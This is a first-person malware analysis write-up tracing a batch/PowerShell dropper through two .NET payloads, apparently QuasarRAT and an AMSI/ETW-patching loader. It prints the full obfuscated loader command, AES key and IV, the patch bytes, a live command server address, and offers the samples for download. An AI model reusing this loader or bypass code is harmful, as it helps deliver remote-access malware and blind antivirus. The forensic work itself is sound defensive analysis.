I was at my desk in the office. It must have been around 12 or 12:30 PM, July 12, 2023. Suddenly, Windows Defender showed a “Threat found” alert. That immediately drew my attention. I checked to see which file it had detected and noticed it was a “udgbQ.vbs” file inside %appdata% that Defender had tagged. Of course, once I got to the folder, I saw Defender immediately remove it from there. If I remember correctly, it was just a 1 KB file – I couldn’t get a look at its contents. However, I also saw two more files – “udgbQ.bat.exe” and “udgbQ.bat”:


(Read after finishing the article: Of note here is that, at first, the exe file wasn’t visible even with the “Show hidden files” option checked in Windows Explorer. But Process Hacker was reporting that such a process was already running, and when asked to go to the file path of the process, it would take me right to %appdata%, with no trace of the exe file – only the bat file could be seen. I then surmised from CurrPorts’ Process Attributes value of “AHS” that it must have been marked as an Archived Hidden System file. So I did an "attrib -s -h -a -r *.*" in the folder and the exe file finally showed up. The attrib trick is from the good old days of virus hunting on Windows XP when I was in school – something my Computer Science teacher had told us about.)

I went into panic mode. I opened up the contents of the rather large bat file and it was a load of gibberish. I’ve included the same file in this folder as a .txt file (“udgbQ.bat.txt”) so that it isn’t executed accidentally. Anyway, its content looks like the following:


Lines 2 through 7 and the final line 9 are legible. This batch script basically runs a hidden powershell instance and copies the legit powershell binary into its own folder under its own name with “.exe” appended, then calls the copied powershell binary with a huge command-line argument (the call "%p%" %U:uLqiO=% line’s %U:uLqiO=% variable resolves into the correct argument because of the huge “set” command on line 8; the %U:uLqiO=% syntax simply takes the value of U and strips every occurrence of the junk string “uLqiO” out of it).

I tried figuring out what this mangled content would resolve into manually but I had also fired up Process Hacker by then and when I took a look at the commandline for the “udgbQ.bat.exe” process that was now running, it was already in plaintext:


First, I suspended the process after realizing it had already established a connection to the following:

Remote address: 51.77.167.52

Remote host name: ip52.ip-51-77-167.eu

Remote port: 6060

Local port: 63421

Protocol: TCP

(I made this observation using the Nirsoft program “CurrPorts”). I then looked into the commandline passed to this weirdly named powershell binary. The commandline was the following:

$oIou='InnJKbvonJKbknJKbenJKb'.Replace('nJKb', '');$AzqP='EnnJKbtrnJKbyPonJKbinJKbntnJKb'.Replace('nJKb', '');$LWEJ='ChnJKbannJKbgenJKbEnJKbxtenJKbnsnJKbionnJKb'.Replace('nJKb', '');$Jwxg='TranJKbnsnJKbfnJKbormnJKbFinnJKbanJKblBlnJKbocknJKb'.Replace('nJKb', '');$pWwA='LoadnJKb'.Replace('nJKb', '');$eDxq='CreanJKbtnJKbeDnJKbecnJKbrypnJKbtnJKbornJKb'.Replace('nJKb', '');$DtTM='MnJKbainJKbnnJKbMonJKbdnJKbulenJKb'.Replace('nJKb', '');$JZlt='SpnJKblinJKbtnJKb'.Replace('nJKb', '');$xzWC='GnJKbetCnJKburnJKbrnJKbennJKbtPnJKbrocnJKbesnJKbsnJKb'.Replace('nJKb', '');$aZrq='FnJKbronJKbmnJKbBnJKbasenJKb64nJKbStrnJKbingnJKb'.Replace('nJKb', '');$zerm='FirnJKbstnJKb'.Replace('nJKb', '');$euof='ReanJKbdnJKbLinJKbnnJKbesnJKb'.Replace('nJKb', '');function SHmms($fIyrX){$OXHzj=[System.Security.Cryptography.Aes]::Create();$OXHzj.Mode=[System.Security.Cryptography.CipherMode]::CBC;$OXHzj.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$OXHzj.Key=[System.Convert]::$aZrq('Ku4UyUqCrVKpr817sKewP+3V+wWyOhyCkaqfyyShZ9E=');$OXHzj.IV=[System.Convert]::$aZrq('6ttlhKwyOYtu8WT6FBC9HQ==');$RRNwL=$OXHzj.$eDxq();$jXMSp=$RRNwL.$Jwxg($fIyrX,0,$fIyrX.Length);$RRNwL.Dispose();$OXHzj.Dispose();$jXMSp;}function ODGMY($fIyrX){$nYjJX=New-Object System.IO.MemoryStream(,$fIyrX);$fmBrg=New-Object System.IO.MemoryStream;$lLnxw=New-Object System.IO.Compression.GZipStream($nYjJX,[IO.Compression.CompressionMode]::Decompress);$lLnxw.CopyTo($fmBrg);$lLnxw.Dispose();$nYjJX.Dispose();$fmBrg.Dispose();$fmBrg.ToArray();}$KawWa=[System.Linq.Enumerable]::$zerm([System.IO.File]::$euof([System.IO.Path]::$LWEJ([System.Diagnostics.Process]::$xzWC().$DtTM.FileName, $null)));$RIswh=$KawWa.Substring(3).$JZlt(':');$qTCRy=ODGMY (SHmms ([Convert]::$aZrq($RIswh[0])));$DWMcP=ODGMY (SHmms ([Convert]::$aZrq($RIswh[1])));[System.Reflection.Assembly]::$pWwA([byte[]]$DWMcP).$AzqP.$oIou($null,$null);[System.Reflection.Assembly]::$pWwA([byte[]]$qTCRy).$AzqP.$oIou($null,$null);

This was better than what was in the bat file but still not entirely obvious. I tried a bunch of things, including manually cleaning up the .Replace() calls and separating out the semicolon-delimited statements for better readability, and tried CyberChef as well, but finally settled on just pasting the whole thing into Visual Studio Code, saving it as a .ps1 file once I realized it was a PowerShell script, and formatting the file using VS Code’s PowerShell extension. It got a lot cleaner and looked a lot more like a normal PowerShell script. I didn’t want to do the .Replace() calls on my own, so I just added a breakpoint after all the .Replace() calls and simply hovered my cursor over the variables to see what they resolved to. Eventually, I manually replaced all the variables with their resolved string values as follows:


(Note that I’ve modified line 42 to use a valid path to the .exe file)

This script file has also been included in the same folder as this document.

I stepped through the code in VS Code, careful not to actually run whatever it was trying to run (I’ve commented out the final two lines of the file, which actually invoke the two payloads), and let VS Code and PowerShell do all the decrypting and what have you. I also added code to dump the payloads as .bin files.

So, recapitulating the situation as a whole: the .bat file itself contains the compressed, encrypted and base64’ed versions of the two payloads, separated by a colon ‘:’ towards the beginning of the file, and also contains the batch script that instructs powershell to extract these two payloads and execute them. All of that in just one file! That’s really cool.

Anyway, I managed to dump the first payload (decompressed ~1.2 MB) and Windows Defender and Avira (at this point, I’d already hurriedly installed the best free AV solution I know - Avira Antivirus) immediately picked it up. I disabled them for a moment and asked what VirusTotal thought of it:


Here’s the scan link.

Running Exe Info PE on the payload revealed that it’s a .NET assembly, and running .NET Reflector on it suggests it was likely crypted with ScrubCrypter:



The actual RAT or stealer or whatever it is, is encrypted and is going to be decrypted and loaded at runtime by this .NET crypter.

It is obvious from Reflector that this assembly is obfuscated. So, I used de4dot to deobfuscate it:


Though it says Unknown obfuscation, it produces a deobfuscated assembly and loading it up with dnSpy reveals that the deobfuscation works:

The class names and the methods and the variables are legible.

Now, I just place a breakpoint at line 31 (guessing that the previous line returns the decrypted payload as a byte array), right-click on the “rawAssembly” local variable, click Save, and voila – I have the original payload. It is about 3.2 MB in size, and Detect It Easy says this payload is a .NET Framework 4 executable as well:


VirusTotal is fairly certain that it is QuasarRAT:


Now, moving on to the next payload in the bat file (obtained by dumping the byte array inside the function call at line 45 of the powershell script). This payload is smaller – only about 15 KB. VirusTotal says it’s a Trojan named “Barys”:


I load it in dnSpy and see mangled names here as well, similar to the first payload, so I use de4dot on it to deobfuscate/clean it as far as possible (though it says the obfuscator is unknown here as well):


Here’s the payload loaded in dnSpy, both the original version and the cleaned version:


The names are readable at least, though the strings are all gibberish, and a lot of Win32 API calls appear to be made dynamically – lots of Marshal.GetDelegateForFunctionPointer() calls. The names of the API calls aren’t visible either:



Looks like it’s obtaining the address of API function addresses from its process and resolving them to their corresponding function delegates. These delegates and their parameters look familiar – CloseHandle(), VirtualProtect(), CreateFile(), CreateFileMapping(), CopyMemory(), IsWow64Process() etc.

And it’s also got it’s own GetProcAddress() implementation as smethod_4. In this screenshot, it’s running through the 1634 exports of kernel32.dll whose base address it got from this other method smethod_3 which basically functions as its own version of GetModuleHandle():



Once it arrives at the requested API function (in this case, CloseHandle()), it stops and returns the address:


And it’s got smethod_2 that gives it the address of any exported API function from any library using the results of smethod_3 and smethod_4:


The following static members are delegates or ready-to-use functions for these win32 APIs: kernel32.dll!CloseHandle(), kernel32.dll!FreeLibrary(), kernel32.dll!VirtualProtect(), kernel32.dll!CreateFileA(), kernel32.dll!CreateFileMappingA(), kernel32.dll!MapViewOfFile(), msvcrt.dll!memcpy(), psapi.dll!GetModuleInformation() and kernel32.dll!IsWow64Process():


Oh, and smethod_0 is what resolves the garbage strings to their real forms:



Now, let’s see the Main() method of the program:


It calls smethod_1 with “ntdll.dll” as the parameter (the smethod_0 call resolves the Chinese-looking characters into “ntdll.dll”):



I copied the method into Visual Studio Code and added some comments, since the previously prepared delegates for win32 API functions have been used in this method. I’ve included this code in the “SecondPayload” folder:


I also asked Skype’s Bing chat what this code did:



I also searched the internet for why a program might want to manually map ntdll and came up with some informative articles:

https://s3cur3th1ssh1t.github.io/A-tale-of-EDR-bypass-methods/

https://blog.nviso.eu/2020/11/20/dynamic-invocation-in-net-to-bypass-hooks/

Turns out, it’s an AV evasion technique to avoid falling into the trap of hooks set by antivirus software. Most realtime AV software will place hooks into API functions exported by windows dll files that are commonly used by most programs to inspect the data being passed to these functions and check if anything fishy is going on and stuff like that. If a malware calls any API exported by such a dll say, ntdll.dll, its function calls are going to be intercepted by the AV. So, in a bid to circumvent this “function hooking” set up by AVs, malwares use a trick called “manual mapping” of the required dlls, so that the modified/hooked function exports of the loaded dlls are replaced by a fresh copy mapped directly from their corresponding files on disk. After this step, the malware can safely call any export of the dll and be sure that the AV won’t be privy to this operation.

So, all that smethod_1 is doing is mapping a fresh, unmodified copy of ntdll.dll into its memory. The same thing is done to kernel32.dll as well, if the OS is Windows 10 or 11 (major version no. > 10) and 64-bit:

Now, line 16 i.e. smethod_0 call looks like following:


The first parameter is “amsi.dll” – a DLL present on Windows starting from Windows 10 that exposes functions for checking whether a given buffer contains malicious code (see the AmsiScanBuffer function on MSDN). The second parameter is “AmsiScanBuffer”, a function exported by amsi.dll. On Windows, when PowerShell is opened, it always loads this DLL and calls the aforementioned function to check for malicious payloads while executing powershell scripts. The third parameter, ‘byte_0’, holds an array of bytes: { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 }, and the fourth parameter, ‘byte_1’, holds { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00 }, which looked like opcodes to me. I asked Skype Bing Chat, which replied with astonishing specificity and insight – as if these bytes are always used in association with AmsiScanBuffer patching:


So, it basically looks like it’s trying to patch the contents of the AmsiScanBuffer function so that it returns immediately without scanning anything (the bytes decode to mov eax, 0x80070057 followed by a ret/ret n, i.e. return E_INVALIDARG right away), with the effect that every buffer is effectively treated as clean (for details, see AMSI_RESULT_CLEAN on MSDN), for both the 32-bit and 64-bit versions of the process. Apparently, “amsi bypass” has been a thing ever since PowerShell-based malware rose to prominence:

https://blog.f-secure.com/hunting-for-amsi-bypasses/

https://threatresearch.ext.hp.com/disabling-anti-malware-scanning-amsi/

https://www.cyberark.com/resources/threat-research-blog/amsi-bypass-redux

I would guess that if this .NET payload (which is very small, btw – 15 KB is considered tiny these days) is loaded by a powershell script (which runs inside the PowerShell process) via reflection (Assembly.Load() and what not) and invoked (https://stackoverflow.com/questions/23174205/how-can-i-run-an-exe-file-with-assembly-class), the PowerShell process would be defenseless against malicious scripts – even well-known, signatured payloads would fail to be reported, since the AmsiScanBuffer function would always come back clean.

In my case, where I’m running the payload separately as a debuggee under dnSpy’s debugger, there’s no “amsi.dll” to be found among this process’s modules, as is evident from Process Hacker:


So, the program throws an exception and lands on the catch block at line 44:


Now, the smethod_0 call at line 17 looks like the following:


It’s trying to patch another function exported by ntdll – EtwEventWrite()

Turns out, this function is used by processes to expose information about the managed assemblies (.NET binaries) that have been loaded in them. Tools like Process Hacker can see the .NET assemblies loaded in a process because all processes participate in this reporting using EtwEventWrite(). More info can be found all over the internet but I read this article by Adam Chester and found it really enlightening: https://www.mdsec.co.uk/2020/03/hiding-your-net-etw/

From this article, I also learnt that the previous function patch for amsi.dll also works for managed processes using .NET Framework 4.8 and above (they apply checks, when Assembly.Load()’ing a .NET assembly, for malware using amsi.dll’s AmsiScanBuffer()):


More info on this topic is available on the post by Adam Chester I linked above.

Anyway, going back to our EtwEventWrite function patch, the bytes used for patching this time (the third and fourth params of smethod_0) are { 0xC3 } and { 0xC2, 0x14, 0x00 }:


0xC3 is obviously a RET and the 3 bytes in the fourth parameter correspond to RET 0x14 apparently, according to Skype Bing Chat:


Obviously, as before, the fourth parameter is for patching in a x64 bit process.

So, the second call to smethod_0 is intended to hide the loading of .NET assemblies into a process (typically an unmanaged one, as I gathered from the article above), so that tools such as Process Hacker, and probably AVs, don’t see what .NET assemblies have been loaded into it. And of course, this time it succeeds, because ntdll is loaded in all processes:


That’s all this binary does. So, going back to our original powershell script:


Observing lines 48 and 49, it’s clear that the powershell instance is going to first execute the second payload (for the AMSI and EtwEventWrite bypasses) and then the actual first payload, which VirusTotal thought was QuasarRAT. If all had gone well, a PowerShell process would have been running QuasarRAT, Windows Defender wouldn’t have had a clue, and neither it nor we would be any wiser to the fact that a RAT had been loaded into it.

Some side notes:

-Avira doesn’t consistently detect the second payload. Sometimes, it says clean and sometimes says it’s a malware and quarantines it.

-I had noticed mouse cursor flickering a week or two prior to this incident and noted down the times:

July 4, 2023

10:45 AM

12:56 PM

1:55 PM

3:15 PM

3:45 PM

4:15 PM

July 6, 2023

2 PM

2:45 PM

July 7, 2023

2:45 PM

5:15 PM

5:32 PM

July 11, 2023

3:45 PM

4:15 PM

4:36 PM

5:15 PM

-I still don’t know what caused the malware to be dropped into %appdata% in the first place.

-I was at first convinced that the file “udgbQ.bat.exe” was the malware but later realized it’s just an x86 PowerShell binary copied from System32.

-The two payloads have been included in “FirstPayload” and “SecondPayload” folders separately. Each folder contains “output.bin.zip” which is the Gzipped version dumped from the powershell script and can be extracted using Winrar/7-zip. Or, just run the powershell script for decompressing the payloads and dump those bytearrays instead for the actual executable payload.

Download the malware here